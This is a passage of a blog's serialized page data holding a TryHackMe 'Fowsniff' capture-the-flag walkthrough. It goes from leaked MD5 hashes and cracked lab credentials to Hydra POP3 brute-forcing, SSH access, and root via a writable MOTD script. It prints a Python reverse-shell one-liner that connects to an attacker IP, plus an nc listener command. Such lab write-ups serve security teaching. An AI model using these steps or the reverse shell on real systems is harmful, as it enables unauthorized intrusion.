[{"data":1,"prerenderedAt":840},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-fowsniff-writeup":3,"surround-\u002F2025\u002Ftryhackme-fowsniff-writeup":831},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":824,"_id":825,"_source":826,"_file":827,"_stem":828,"_extension":829,"_original_dir":830},"\u002F2025\u002Ftryhackme-fowsniff-writeup","2025",false,"","TryHackMe - Fowsniff CTF","A full writeup for the TryHackMe Fowsniff CTF. Learn how to go from leaked credentials to root access by cracking MD5 hashes, pivoting from POP3 to SSH, and exploiting a writable MOTD script.","2025-09-02T07:57:20.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"3 min read",2.955,177300,591,{"type":21,"children":22,"toc":817},"root",[23,29,45,52,56,93,123,128,132,146,150,155,159,172,176,188,192,197,283,304,308,312,318,352,356,376,380,416,445,450,479,498,517,521,527,540,544,557,561,573,577,597,601,650,795,807,811],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: 
",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fctf",[41],"nofollow",[43],{"type":34,"value":44},"10.10.109.52",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F2.jpg",[],{"type":24,"tag":30,"props":57,"children":58},{},[59,61,68,70,76,77,83,85,91],{"type":34,"value":60},"As you can see, our ",{"type":24,"tag":62,"props":63,"children":65},"code",{"className":64},[],[66],{"type":34,"value":67},"ssh",{"type":34,"value":69},", ",{"type":24,"tag":62,"props":71,"children":73},{"className":72},[],[74],{"type":34,"value":75},"http",{"type":34,"value":69},{"type":24,"tag":62,"props":78,"children":80},{"className":79},[],[81],{"type":34,"value":82},"pop3",{"type":34,"value":84},", and ",{"type":24,"tag":62,"props":86,"children":88},{"className":87},[],[89],{"type":34,"value":90},"imap",{"type":34,"value":92}," services are active.",{"type":24,"tag":94,"props":95,"children":96},"ul",{},[97,112],{"type":24,"tag":98,"props":99,"children":100},"li",{},[101,110],{"type":24,"tag":62,"props":102,"children":107},{"className":103,"id":105,"style":106},[104],"example-info","just-like-this","color: #77BEF0",[108],{"type":34,"value":109},"110\u002FTCP Port (POP3)",{"type":34,"value":111},": This protocol allows users to download their emails from the server to their computers.",{"type":24,"tag":98,"props":113,"children":114},{},[115,121],{"type":24,"tag":62,"props":116,"children":118},{"className":117,"id":105,"style":106},[104],[119],{"type":34,"value":120},"143\u002FTCP Port (IMAP)",{"type":34,"value":122},": IMAP is more advanced than POP3 and allows emails to be managed directly on the server (e.g., folder management, 
deletion).",{"type":24,"tag":30,"props":124,"children":125},{},[126],{"type":34,"value":127},"Now, let's check our web server.",{"type":24,"tag":25,"props":129,"children":131},{"src":130},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F3.jpg",[],{"type":24,"tag":30,"props":133,"children":134},{},[135,137,144],{"type":34,"value":136},"The site states that employee information has been made public as a result of a data breach. It also mentions that the ",{"type":24,"tag":37,"props":138,"children":141},{"href":139,"rel":140},"https:\u002F\u002Fx.com\u002Ffowsniffcorp",[41],[142],{"type":34,"value":143},"@fowsniffcorp",{"type":34,"value":145}," Twitter account has been compromised.",{"type":24,"tag":25,"props":147,"children":149},{"src":148},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":151,"children":152},{},[153],{"type":34,"value":154},"As you can see, sensitive information has been shared from the compromised Twitter page. (In my case, Pastebin didn't work, so I looked at the exposed data on GitHub.)",{"type":24,"tag":25,"props":156,"children":158},{"src":157},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":160,"children":161},{},[162,164,170],{"type":34,"value":163},"Here we have our usernames and hashed passwords. 
When we check these hashes, we see that they are hashed with ",{"type":24,"tag":62,"props":165,"children":167},{"className":166},[],[168],{"type":34,"value":169},"MD5",{"type":34,"value":171},".",{"type":24,"tag":25,"props":173,"children":175},{"src":174},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":177,"children":178},{},[179,181,187],{"type":34,"value":180},"Now, let's crack these hashes using ",{"type":24,"tag":37,"props":182,"children":185},{"href":183,"rel":184},"https:\u002F\u002Fcrackstation.net\u002F",[41],[186],{"type":34,"value":183},{"type":34,"value":171},{"type":24,"tag":25,"props":189,"children":191},{"src":190},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":193,"children":194},{},[195],{"type":34,"value":196},"We obtain the following usernames and passwords:",{"type":24,"tag":94,"props":198,"children":199},{},[200,210,219,228,237,246,256,265,274],{"type":24,"tag":98,"props":201,"children":202},{},[203],{"type":24,"tag":62,"props":204,"children":207},{"className":205,"id":105,"style":206},[104],"color: 
#efb11d",[208],{"type":34,"value":209},"mauer@fowsniff:mailcall",{"type":24,"tag":98,"props":211,"children":212},{},[213],{"type":24,"tag":62,"props":214,"children":216},{"className":215,"id":105,"style":206},[104],[217],{"type":34,"value":218},"mustikka@fowsniff:bilbo101",{"type":24,"tag":98,"props":220,"children":221},{},[222],{"type":24,"tag":62,"props":223,"children":225},{"className":224,"id":105,"style":206},[104],[226],{"type":34,"value":227},"tegel@fowsniff:apples01",{"type":24,"tag":98,"props":229,"children":230},{},[231],{"type":24,"tag":62,"props":232,"children":234},{"className":233,"id":105,"style":206},[104],[235],{"type":34,"value":236},"baksteen@fowsniff:skyler22",{"type":24,"tag":98,"props":238,"children":239},{},[240],{"type":24,"tag":62,"props":241,"children":243},{"className":242,"id":105,"style":206},[104],[244],{"type":34,"value":245},"seina@fowsniff:scoobydoo2",{"type":24,"tag":98,"props":247,"children":248},{},[249],{"type":24,"tag":62,"props":250,"children":253},{"className":251,"id":105,"style":252},[104],"color: #EA5B6F",[254],{"type":34,"value":255},"stone@fowsniff:Not found.",{"type":24,"tag":98,"props":257,"children":258},{},[259],{"type":24,"tag":62,"props":260,"children":262},{"className":261,"id":105,"style":206},[104],[263],{"type":34,"value":264},"mursten@fowsniff:carp4ever",{"type":24,"tag":98,"props":266,"children":267},{},[268],{"type":24,"tag":62,"props":269,"children":271},{"className":270,"id":105,"style":206},[104],[272],{"type":34,"value":273},"parede@fowsniff:orlando12",{"type":24,"tag":98,"props":275,"children":276},{},[277],{"type":24,"tag":62,"props":278,"children":280},{"className":279,"id":105,"style":206},[104],[281],{"type":34,"value":282},"sciana@fowsniff:07011972",{"type":24,"tag":30,"props":284,"children":285},{},[286,288,294,296,302],{"type":34,"value":287},"Now, let's add these to 
",{"type":24,"tag":62,"props":289,"children":291},{"className":290},[],[292],{"type":34,"value":293},"users.txt",{"type":34,"value":295}," and ",{"type":24,"tag":62,"props":297,"children":299},{"className":298},[],[300],{"type":34,"value":301},"passwd.txt",{"type":34,"value":303}," files. We will then use them to brute force the mail service (pop3). This will allow us to see the emails of the user we log in as.",{"type":24,"tag":25,"props":305,"children":307},{"src":306},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F8.jpg",[],{"type":24,"tag":25,"props":309,"children":311},{"src":310},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F9.jpg",[],{"type":24,"tag":46,"props":313,"children":315},{"id":314},"initial-access",[316],{"type":34,"value":317},"Initial Access",{"type":24,"tag":30,"props":319,"children":320},{},[321,323,330,332,337,338,343,345,350],{"type":34,"value":322},"I will use ",{"type":24,"tag":62,"props":324,"children":327},{"className":325,"id":105,"style":326},[104],"color: #4DFFBE",[328],{"type":34,"value":329},"hydra",{"type":34,"value":331}," for the login attempts. 
After providing our ",{"type":24,"tag":62,"props":333,"children":335},{"className":334},[],[336],{"type":34,"value":293},{"type":34,"value":295},{"type":24,"tag":62,"props":339,"children":341},{"className":340},[],[342],{"type":34,"value":301},{"type":34,"value":344}," files with the necessary parameters, we specify the protocol to attack as ",{"type":24,"tag":62,"props":346,"children":348},{"className":347},[],[349],{"type":34,"value":82},{"type":34,"value":351}," and then our target server.",{"type":24,"tag":25,"props":353,"children":355},{"src":354},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F10.jpg",[],{"type":24,"tag":30,"props":357,"children":358},{},[359,361,367,369,374],{"type":34,"value":360},"Hydra did not yield any results. After some trials, we realized we needed to remove the ",{"type":24,"tag":62,"props":362,"children":364},{"className":363,"id":105,"style":252},[104],[365],{"type":34,"value":366},"@fowsniff",{"type":34,"value":368}," part from the usernames. Let's update the ",{"type":24,"tag":62,"props":370,"children":372},{"className":371},[],[373],{"type":34,"value":293},{"type":34,"value":375}," file and try to log in with hydra again.",{"type":24,"tag":25,"props":377,"children":379},{"src":378},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F11.jpg",[],{"type":24,"tag":30,"props":381,"children":382},{},[383,385,391,393,398,400,406,408,414],{"type":34,"value":384},"And yes, we saw that the pair ",{"type":24,"tag":62,"props":386,"children":388},{"className":387,"id":105,"style":326},[104],[389],{"type":34,"value":390},"seina:scoobydoo2",{"type":34,"value":392}," was able to log in successfully. 
Now, let's connect to the server's ",{"type":24,"tag":62,"props":394,"children":396},{"className":395},[],[397],{"type":34,"value":82},{"type":34,"value":399}," service, port ",{"type":24,"tag":62,"props":401,"children":403},{"className":402},[],[404],{"type":34,"value":405},"110",{"type":34,"value":407},", with ",{"type":24,"tag":62,"props":409,"children":411},{"className":410},[],[412],{"type":34,"value":413},"nc",{"type":34,"value":415}," and see what we can get.",{"type":24,"tag":94,"props":417,"children":418},{},[419,430],{"type":24,"tag":98,"props":420,"children":421},{},[422,428],{"type":24,"tag":62,"props":423,"children":425},{"className":424,"id":105,"style":106},[104],[426],{"type":34,"value":427},"USER \u003Cusername>",{"type":34,"value":429},": We specify the user to log in.",{"type":24,"tag":98,"props":431,"children":432},{},[433,439,441],{"type":24,"tag":62,"props":434,"children":436},{"className":435,"id":105,"style":106},[104],[437],{"type":34,"value":438},"PASS \u003Cpassword>",{"type":34,"value":440},": We enter the user's password.",{"type":24,"tag":25,"props":442,"children":444},{"src":443},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":446,"children":447},{},[448],{"type":34,"value":449},"Now we will look at the emails on the server with the following commands:",{"type":24,"tag":94,"props":451,"children":452},{},[453,464],{"type":24,"tag":98,"props":454,"children":455},{},[456,462],{"type":24,"tag":62,"props":457,"children":459},{"className":458,"id":105,"style":106},[104],[460],{"type":34,"value":461},"LIST",{"type":34,"value":463},": Lists the number and size of all messages in the mailbox.",{"type":24,"tag":98,"props":465,"children":466},{},[467,473,475],{"type":24,"tag":62,"props":468,"children":470},{"className":469,"id":105,"style":106},[104],[471],{"type":34,"value":472},"RETR \u003Cmail_number>",{"type":34,"value":474},": Displays 
the content of the email at the specified number.",{"type":24,"tag":25,"props":476,"children":478},{"src":477},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F13.jpg",[],{"type":24,"tag":30,"props":480,"children":481},{},[482,484,490,492],{"type":34,"value":483},"When we check, we find potential usernames (to whom it was sent) and a temporary SSH password inside email number ",{"type":24,"tag":62,"props":485,"children":487},{"className":486},[],[488],{"type":34,"value":489},"1",{"type":34,"value":491},": ",{"type":24,"tag":62,"props":493,"children":495},{"className":494,"id":105,"style":326},[104],[496],{"type":34,"value":497},"S1ck3nBluff+secureshell",{"type":24,"tag":30,"props":499,"children":500},{},[501,503,508,510,516],{"type":34,"value":502},"After some trials, we were able to log in via ",{"type":24,"tag":62,"props":504,"children":506},{"className":505},[],[507],{"type":34,"value":67},{"type":34,"value":509}," with the pair ",{"type":24,"tag":62,"props":511,"children":513},{"className":512,"id":105,"style":326},[104],[514],{"type":34,"value":515},"baksteen:S1ck3nBluff+secureshell",{"type":34,"value":171},{"type":24,"tag":25,"props":518,"children":520},{"src":519},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F14.jpg",[],{"type":24,"tag":46,"props":522,"children":524},{"id":523},"privilege-escalation",[525],{"type":34,"value":526},"Privilege Escalation",{"type":24,"tag":30,"props":528,"children":529},{},[530,532,538],{"type":34,"value":531},"Let's upload our ",{"type":24,"tag":62,"props":533,"children":535},{"className":534},[],[536],{"type":34,"value":537},"linpeas.sh",{"type":34,"value":539}," file to the target system and look for possible privilege escalation 
paths.",{"type":24,"tag":25,"props":541,"children":543},{"src":542},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F15.jpg",[],{"type":24,"tag":30,"props":545,"children":546},{},[547,549,555],{"type":34,"value":548},"In the linpeas.sh output, the ",{"type":24,"tag":62,"props":550,"children":552},{"className":551,"id":105,"style":326},[104],[553],{"type":34,"value":554},"\u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":556}," file catches our attention: we have write permission for it because our account is in the users group.",{"type":24,"tag":25,"props":558,"children":560},{"src":559},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":562,"children":563},{},[564,566,571],{"type":34,"value":565},"When we open this file, we see that it contains the banner shown at the start of our ",{"type":24,"tag":62,"props":567,"children":569},{"className":568},[],[570],{"type":34,"value":67},{"type":34,"value":572}," session.",{"type":24,"tag":25,"props":574,"children":576},{"src":575},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F17.jpg",[],{"type":24,"tag":30,"props":578,"children":579},{},[580,582,588,590,595],{"type":34,"value":581},"From this, we understand that something on the system loads this file and displays it to us as the banner at the beginning of the session. Normally, the ",{"type":24,"tag":62,"props":583,"children":585},{"className":584,"id":105,"style":326},[104],[586],{"type":34,"value":587},"\u002Fetc\u002Fupdate-motd.d\u002F",{"type":34,"value":589}," directory is used for this purpose. The files in this directory are executed automatically in order. 
And the scripts in this ",{"type":24,"tag":62,"props":591,"children":593},{"className":592},[],[594],{"type":34,"value":587},{"type":34,"value":596}," directory run with root privileges, not with the privileges of the user logging in. Let's check the scripts in this directory.",{"type":24,"tag":25,"props":598,"children":600},{"src":599},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F18.jpg",[],{"type":24,"tag":30,"props":602,"children":603},{},[604,606,612,614,619,621,626,628,633,635,640,642,648],{"type":34,"value":605},"And yes, at the very bottom, the command ",{"type":24,"tag":62,"props":607,"children":609},{"className":608,"id":105,"style":206},[104],[610],{"type":34,"value":611},"sh \u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":613}," runs our file. We also know that the scripts in ",{"type":24,"tag":62,"props":615,"children":617},{"className":616},[],[618],{"type":34,"value":587},{"type":34,"value":620}," run with ",{"type":24,"tag":62,"props":622,"children":624},{"className":623},[],[625],{"type":34,"value":21},{"type":34,"value":627}," privileges. That is the root cause: a script that root executes at every login is writable by an unprivileged group, so anything written to it runs as root (the fix is to make it root-owned and writable only by root). If we put a reverse shell inside our ",{"type":24,"tag":62,"props":629,"children":631},{"className":630},[],[632],{"type":34,"value":554},{"type":34,"value":634}," script and then close and reopen our ",{"type":24,"tag":62,"props":636,"children":638},{"className":637},[],[639],{"type":34,"value":67},{"type":34,"value":641}," session, the ",{"type":24,"tag":62,"props":643,"children":645},{"className":644,"id":105,"style":326},[104],[646],{"type":34,"value":647},"\u002Fetc\u002Fupdate-motd.d\u002F00-header",{"type":34,"value":649}," file will run with root privileges and call our script, and we should automatically get a shell on our listener. 
Let's not wait, let's try it:",{"type":24,"tag":651,"props":652,"children":653},"ol",{},[654,667,767,779],{"type":24,"tag":98,"props":655,"children":656},{},[657,659,665],{"type":34,"value":658},"Let's open our script with the ",{"type":24,"tag":62,"props":660,"children":662},{"className":661},[],[663],{"type":34,"value":664},"nano \u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":666}," command and delete everything.",{"type":24,"tag":98,"props":668,"children":669},{},[670,672,679,681],{"type":34,"value":671},"Let's add the following reverse shell to our script. (For various reverse shells, ",{"type":24,"tag":37,"props":673,"children":676},{"href":674,"rel":675},"https:\u002F\u002Fwww.revshells.com\u002F",[41],[677],{"type":34,"value":678},"click here",{"type":34,"value":680},".)",{"type":24,"tag":682,"props":683,"children":687},"pre",{"className":684,"code":685,"language":686,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","export RHOST=\"10.8.13.246\";export RPORT=8080;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n","bash",[688],{"type":24,"tag":62,"props":689,"children":690},{"__ignoreMap":7},[691],{"type":24,"tag":692,"props":693,"children":696},"span",{"class":694,"line":695},"line",1,[697,703,709,715,721,727,731,736,740,746,750,756,762],{"type":24,"tag":692,"props":698,"children":700},{"style":699},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[701],{"type":34,"value":702},"export",{"type":24,"tag":692,"props":704,"children":706},{"style":705},"--shiki-default:#4C4F69;--shiki-dark:#E06C75",[707],{"type":34,"value":708}," 
RHOST",{"type":24,"tag":692,"props":710,"children":712},{"style":711},"--shiki-default:#179299;--shiki-dark:#56B6C2",[713],{"type":34,"value":714},"=",{"type":24,"tag":692,"props":716,"children":718},{"style":717},"--shiki-default:#40A02B;--shiki-dark:#98C379",[719],{"type":34,"value":720},"\"10.8.13.246\"",{"type":24,"tag":692,"props":722,"children":724},{"style":723},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[725],{"type":34,"value":726},";",{"type":24,"tag":692,"props":728,"children":729},{"style":699},[730],{"type":34,"value":702},{"type":24,"tag":692,"props":732,"children":733},{"style":705},[734],{"type":34,"value":735}," RPORT",{"type":24,"tag":692,"props":737,"children":738},{"style":711},[739],{"type":34,"value":714},{"type":24,"tag":692,"props":741,"children":743},{"style":742},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[744],{"type":34,"value":745},"8080",{"type":24,"tag":692,"props":747,"children":748},{"style":723},[749],{"type":34,"value":726},{"type":24,"tag":692,"props":751,"children":753},{"style":752},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[754],{"type":34,"value":755},"python3",{"type":24,"tag":692,"props":757,"children":759},{"style":758},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[760],{"type":34,"value":761}," -c",{"type":24,"tag":692,"props":763,"children":764},{"style":717},[765],{"type":34,"value":766}," 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n",{"type":24,"tag":98,"props":768,"children":769},{},[770,772,778],{"type":34,"value":771},"Let's open a listening port on our machine with ",{"type":24,"tag":62,"props":773,"children":775},{"className":774},[],[776],{"type":34,"value":777},"nc -nvlp 8080",{"type":34,"value":171},{"type":24,"tag":98,"props":780,"children":781},{},[782,784,789,791],{"type":34,"value":783},"Let's disconnect 
the ",{"type":24,"tag":62,"props":785,"children":787},{"className":786},[],[788],{"type":34,"value":67},{"type":34,"value":790}," connection to the target machine and then reconnect.",{"type":24,"tag":25,"props":792,"children":794},{"src":793},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F19.jpg",[],{"type":24,"tag":30,"props":796,"children":797},{},[798,800,805],{"type":34,"value":799},"Now, when we check our listener, we will see that we have obtained a shell as the ",{"type":24,"tag":62,"props":801,"children":803},{"className":802},[],[804],{"type":34,"value":21},{"type":34,"value":806}," user.",{"type":24,"tag":25,"props":808,"children":810},{"src":809},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F20.jpg",[],{"type":24,"tag":812,"props":813,"children":814},"style",{},[815],{"type":34,"value":816},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 
var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":818,"depth":818,"links":819},4,[820,822,823],{"id":48,"depth":821,"text":51},2,{"id":314,"depth":821,"text":317},{"id":523,"depth":821,"text":526},"markdown","content:posts:2025:tryhackme-fowsniff-writeup.md","content","posts\u002F2025\u002Ftryhackme-fowsniff-writeup.md","posts\u002F2025\u002Ftryhackme-fowsniff-writeup","md","\u002Fposts",[832,836],{"_path":833,"title":834,"date":835},"\u002F2025\u002Ftryhackme-anthem-writeup","TryHackMe - Anthem","2025-09-01T17:37:04.000Z",{"_path":837,"title":838,"date":839},"\u002F2025\u002Ftryhackme-year-of-the-rabbit-writeup","TryHackMe - Year of the Rabbit","2025-09-03T15:56:06.000Z",1776877919312]